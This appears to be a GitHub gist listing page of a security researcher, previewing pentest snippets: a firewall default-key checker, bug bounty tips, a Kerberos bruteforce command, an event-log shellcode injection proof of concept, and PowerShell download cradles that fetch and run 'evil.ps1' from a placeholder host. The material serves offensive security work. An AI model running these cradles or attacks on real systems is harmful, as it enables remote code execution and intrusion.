Skip to content

Instantly share code, notes, and snippets.

View davehardy20's full-sized avatar

Dave Hardy davehardy20

122 followers · 325 following
  • UK
View GitHub Profile
@davehardy20
davehardy20 / checkmk.py
Created August 3, 2022 06:49 — forked from rqu1/checkmk.py
check if a PAN firewall is using the default master key when globalprotect is enabled
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'
class PanCrypt():
@davehardy20
davehardy20 / Bug Bounty Checklist and Cheatsheets.md
Created July 24, 2022 15:24 — forked from OTaKuHP/Bug Bounty Checklist and Cheatsheets.md
@davehardy20
davehardy20 / Bug_Bounty_tips
Created July 24, 2022 15:24 — forked from BugHunter001/Bug_Bounty_tips
site.com/file.php
response = nothing
http://site.com/file.php~
response = source
-------------------------------------
https://github.com/kleiton0x00/CRLF-one-liner
------------------------------------------
try to add admin as your user,
change his email to yours,
@davehardy20
davehardy20 / Bug_Bounty_tips
Created July 24, 2022 15:24 — forked from BugHunter001/Bug_Bounty_tips
site.com/file.php
response = nothing
http://site.com/file.php~
response = source
-------------------------------------
https://github.com/kleiton0x00/CRLF-one-liner
------------------------------------------
try to add admin as your user,
change his email to yours,
@davehardy20
davehardy20 / kerberos_attacks_cheatsheet.md
Created May 13, 2022 06:56 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@davehardy20
davehardy20 / EventLogInject.cs
Created May 9, 2022 16:17
POC to inject and extract shellcode from Windows Event Logs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace HiddenEventLogs
{
@davehardy20
davehardy20 / Download-Cradles-Oneliners.md
Created February 17, 2021 11:05 — forked from mgeeky/Download-Cradles-Oneliners.md
Various Powershell Download Cradles purposed as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
@davehardy20
davehardy20 / DownloadCradles.ps1
Created February 17, 2021 11:04 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@davehardy20
davehardy20 / JavascriptRecon.md
Created January 28, 2021 16:11
My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

  • The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)
@davehardy20
davehardy20 / DisplayImage.ps1
Created January 27, 2021 22:36 — forked from zippy1981/DisplayImage.ps1
Display an image from Windows Powershell
# Loosely based on http://www.vistax64.com/powershell/202216-display-image-powershell.html
[void][reflection.assembly]::LoadWithPartialName("System.Windows.Forms")
$file = (get-item 'C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg')
#$file = (get-item "c:\image.jpg")
$img = [System.Drawing.Image]::Fromfile($file);
# This tip from http://stackoverflow.com/questions/3358372/windows-forms-look-different-in-powershell-and-powershell-ise-why/3359274#3359274